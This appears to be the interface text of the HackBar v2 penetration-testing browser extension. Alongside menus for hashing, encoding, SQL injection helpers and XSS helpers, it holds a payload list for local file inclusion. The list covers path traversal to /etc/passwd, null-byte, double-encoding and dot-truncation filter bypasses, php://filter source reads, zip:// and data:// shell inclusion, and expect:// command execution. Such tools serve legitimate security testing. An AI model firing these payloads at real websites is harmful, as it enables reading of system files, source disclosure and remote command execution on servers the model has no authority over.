Encryption
MD5
SHA-1
SHA-256
ROT13
Encoding
Base64 Encode
Base64 Decode
URL Encode
URL Decode
Hex Encode
Hex Decode
SQL
MySQL CHAR()
Basic info column
Convert using UTF-8
Convert using Latin-1
MSQL CHAR()
Oracle CHAR()
Union Select Statment
Spaces to inline comments
XSS
String.fromCharCode
HTML Characters
XSS Alert
LFI
Basic
Basic LF
?page=../../../etc/passwd
Null byte
?page=../../../etc/passwd%00
Double encoding
?page=%252e%252e%252fetc%252fpasswd
?page=%252e%252e%252fetc%252fpasswd%00
Path and dot truncation
?page=../../../etc/passwd............[ADD MORE]
?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
?page=../../../etc/passwd/./././././.[ADD MORE]
?page=../../../[ADD MORE]../../../../etc/passwd
Filter bypass tricks
?page=....//....//etc/passwd
?page=..///////..////..//////etc/passwd
?page=../../../etc/passwd/./././././.[ADD MORE]
?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Using wrappers
php://filter
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://FilTer/convert.base64-encode/resource=index.php
zip://
?page=zip://shell.jpg%23payload.php
data://
?page=data://text/plain;base64,[base64_encode_shell]
expect://
?page=expect://id
?page=expect://ls
input://
?page=php://input | POST DATA:
XXE
Comming soon
Other
Jsonify
Uppercase
Lowercase
©微信公众号: 江南小虫虫
HackBar v2
Load URL
Split URL
Execute
ADD "/"
Post data
Referer
User Agent
Cookies
Clear All
R
U
C
Please enter some text
OK